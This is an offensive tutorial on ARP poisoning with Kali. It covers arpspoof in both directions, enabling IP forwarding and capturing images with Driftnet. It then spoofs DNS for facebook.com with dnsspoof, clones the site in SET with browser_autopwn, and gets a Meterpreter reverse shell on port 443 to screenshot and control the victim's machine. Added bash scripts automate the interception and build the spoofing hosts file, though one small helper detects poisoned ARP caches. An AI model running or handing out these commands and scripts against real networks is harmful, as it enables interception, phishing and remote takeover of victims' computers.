ARP poisoning with Kali to reverse shell

An ARP MITM attack requires poisoning the ARP cache on both ends of the victim's path: the gateway (192.168.111.222) is told that the victim's IP (192.168.2.4) lives at the attacker's MAC address, and the victim is told that the gateway's IP lives at the attacker's MAC address. arpspoof takes the host to poison with -t and the IP address to impersonate as its last argument, so run the following two commands in two separate terminals in Kali (ARP is a link-layer protocol, so the attacker must sit on the same broadcast domain as the hosts being poisoned):

arpspoof -i eth6 -t 192.168.111.222 192.168.2.4 

arpspoof -i eth6 -t 192.168.2.4 192.168.111.222

Note that the arpspoof commands themselves will run without IP forwarding, but the victim's traffic will then be dropped at the attacker's machine instead of being relayed to the gateway, which cuts the victim off the network rather than silently intercepting it. Check the current status of IP forwarding with the following command:

cat /proc/sys/net/ipv4/ip_forward

If the output is "0", IP forwarding is currently disabled. To enable it (as root), use the following command:

echo 1 > /proc/sys/net/ipv4/ip_forward

Once the man-in-the-middle position is established, the victim's traffic passes through the attacker's machine, and a tool called Driftnet (driftnet -i <interface>) can display images pulled out of the victim's unencrypted HTTP browsing; anything carried over HTTPS stays opaque.
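The steps above, as one added example script (not code from the original page): it records the current ip_forward value, enables forwarding, starts arpspoof in both directions, runs Driftnet in the foreground, and on exit sends arpspoof SIGINT so it re-advertises the real MAC addresses before the forwarding setting is restored. The interface and addresses default to the page's eth6, 192.168.111.222 (gateway) and 192.168.2.4 (victim); arpspoof (dsniff) and driftnet are assumed to be installed. The arp_dup_macs helper is an added check for the other side of the exchange: fed the output of ip neigh show from the victim or gateway, it prints any MAC address that answers for more than one IP, which is what a poisoned cache looks like. The SAMPLE_NEIGH lines are constructed for the demonstration.

```shell
#!/usr/bin/env bash
# Added example wrapping the ARP MITM steps from the page; arpspoof, driftnet
# and the /proc path are real, the defaults (eth6, IPs) come from the page,
# and SAMPLE_NEIGH is constructed sample data, not a real capture.

IPFWD=/proc/sys/net/ipv4/ip_forward

# Current ip_forward value (0 or 1). The path can be overridden for testing.
ip_forward_get() { tr -d '[:space:]' < "${1:-$IPFWD}"; }

# The two arpspoof command lines: the first poisons the gateway's view of the
# victim, the second poisons the victim's view of the gateway.
arpspoof_cmds() {
  local iface=$1 gw=$2 victim=$3
  printf 'arpspoof -i %s -t %s %s\n' "$iface" "$gw" "$victim"
  printf 'arpspoof -i %s -t %s %s\n' "$iface" "$victim" "$gw"
}

# Detection check: read `ip neigh show` lines on stdin and print every MAC
# (the token after "lladdr") that is mapped to more than one IP address.
arp_dup_macs() {
  awk '/lladdr/ { for (i = 1; i <= NF; i++) if ($i == "lladdr") mac[$(i+1)]++ }
       END { for (m in mac) if (mac[m] > 1) print m }' | sort
}

# Constructed sample: a victim cache after poisoning, where the attacker MAC
# aa:bb:cc:dd:ee:ff now answers for the gateway (192.168.2.1) as well as itself.
SAMPLE_NEIGH='192.168.2.1 dev eth0 lladdr aa:bb:cc:dd:ee:ff REACHABLE
192.168.2.4 dev eth0 lladdr aa:bb:cc:dd:ee:ff STALE
192.168.2.9 dev eth0 lladdr 11:22:33:44:55:66 REACHABLE'

# Run the attack: enable forwarding, spoof both directions, show images,
# and undo everything when Driftnet exits or the script is interrupted.
run_mitm() {
  local iface=$1 gw=$2 victim=$3 orig p1 p2
  [ "$(id -u)" -eq 0 ] || { echo "run_mitm: root required" >&2; return 1; }
  orig=$(ip_forward_get)
  echo 1 > "$IPFWD"
  arpspoof -i "$iface" -t "$gw" "$victim" >/dev/null 2>&1 &
  p1=$!
  arpspoof -i "$iface" -t "$victim" "$gw" >/dev/null 2>&1 &
  p2=$!
  # SIGINT makes arpspoof re-ARP the real addresses before it exits; then
  # put ip_forward back to whatever it was.
  trap 'kill -INT $p1 $p2 2>/dev/null; wait $p1 $p2 2>/dev/null; echo "$orig" > "$IPFWD"' EXIT INT TERM
  driftnet -i "$iface"
}

# The attack only starts when asked for explicitly, so the file is safe to
# source or run for its helper functions.
if [ "${1:-}" = "--run" ]; then
  run_mitm "${2:-eth6}" "${3:-192.168.111.222}" "${4:-192.168.2.4}"
fi
```

Run it as root with `./arp_mitm.sh --run eth6 192.168.111.222 192.168.2.4`; on the victim, `ip neigh show | ./arp_mitm.sh` is not needed, but sourcing the file and running `ip neigh show | arp_dup_macs` prints the attacker's MAC once the poisoning has taken effect.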

DNS cache poisoning

DNS cache poisoning, in this setup, means spoofing a website like Facebook and tricking the user into visiting the attacker's copy of it, which can then deliver a browser exploit and return a reverse shell. Strictly speaking, dnsspoof forges DNS responses rather than poisoning a resolver's cache: from the MITM position it sees the victim's queries and answers them with the attacker's address before the real reply arrives. To begin, create a text file in hosts(5) format, the IP address first and then the hostname (hostnames may contain "*" wildcards), and name it something like facebook:

192.168.248.204 www.facebook.com

192.168.248.204 *.facebook.com

Save this text file and then run the following command:

dnsspoof -i eth6 -f facebook

This command answers any DNS query for the listed Facebook names that passes the attacker's interface with a forged response pointing at the attacker's machine. The attacker can then clone the Facebook page and make it appear as realistic as possible.
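The hosts file used by dnsspoof is easy to get backwards (address and name swapped), and dnsspoof silently ignores malformed lines, so the following added example (not from the original page) generates the file for one or more domains, adding the wildcard entry for subdomains, and checks an existing file for the IP-then-hostname order before it is handed to dnsspoof. The attacker address 192.168.248.204 is the page's; the output filename "facebook" is the one the page suggests.

```shell
#!/usr/bin/env bash
# Added example: build and validate a dnsspoof hosts file. dnsspoof reads
# hosts(5) format (IPv4 address, then hostname, "*" wildcards allowed);
# the address and filename below are taken from the page.

# Print hosts-file lines sending each domain and its subdomains to $ip.
dnsspoof_hosts_make() {
  local ip=$1 d
  shift
  for d in "$@"; do
    printf '%s %s\n' "$ip" "$d"
    printf '%s *.%s\n' "$ip" "$d"
  done
}

# Validate a hosts file on stdin. Blank lines and comments are skipped;
# every other line must be "<dotted-quad IPv4> <hostname-or-wildcard>".
# Offending lines are printed and the function returns 1 if any were found.
dnsspoof_hosts_check() {
  awk '
    function valid_ip(s,  p, n, i) {
      n = split(s, p, ".")
      if (n != 4) return 0
      for (i = 1; i <= 4; i++)
        if (p[i] !~ /^[0-9]+$/ || p[i] > 255) return 0
      return 1
    }
    /^[[:space:]]*(#|$)/ { next }
    {
      ok = (NF == 2 && valid_ip($1) && $2 ~ /^[A-Za-z0-9*.-]+$/)
      if (!ok) { bad++; print "bad line " NR ": " $0 }
    }
    END { exit (bad > 0) }'
}

# With --write, produce the "facebook" file the page feeds to dnsspoof.
if [ "${1:-}" = "--write" ]; then
  dnsspoof_hosts_make "${2:-192.168.248.204}" facebook.com > facebook
  dnsspoof_hosts_check < facebook && echo "facebook: ok"
fi
```

Typical use is `./dnsspoof_hosts.sh --write 192.168.248.204` followed by `dnsspoof -i eth6 -f facebook`; piping a hand-written file through dnsspoof_hosts_check catches the reversed "hostname address" form that dnsspoof would otherwise ignore.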

Next, use a client-side attack against the victim's browser using the Social Engineer Toolkit (SET) by Dave Kennedy. SET is pre-installed in Kali Linux, so simply run setoolkit in a terminal to launch the tool. From its menus, choose the website attack vector that clones a site and serves Metasploit browser exploits from it (in current SET builds this is Social-Engineering Attacks, then Website Attack Vectors, then Metasploit Browser Exploit Method, then Site Cloner; the menu numbers vary between versions), and then answer the prompts as follows:

Select "no" to NAT/Port Forwarding, and enter the IP address of the attacker's machine when prompted (this is the address the reverse connection comes back to, so it must be reachable from the victim). When asked which website to clone, enter http://www.facebook.com. Then select "browser_autopwn", which serves a batch of browser exploits and fires whichever matches the victim's browser, and set the payload to Meterpreter (4), with port 443, so the reverse connection looks like ordinary HTTPS traffic. Note that this only works against a victim who accepts the plain-HTTP clone: a modern browser that has seen the real site's HSTS policy (Facebook publishes one) refuses to load the http:// version at all, so the technique is realistic only against lab targets without that protection.

If one of the exploits succeeds, a Meterpreter session will be established with the victim's machine and reported in the msfconsole that SET launched. To interact with the session, use the following command (the number is the session id shown by the sessions command):

sessions -i 1

Then type screenshot to take a screenshot of the victim's desktop, and shell to open a command shell on the victim's machine. You now have access to the victim's file system with the privileges of the exploited browser process.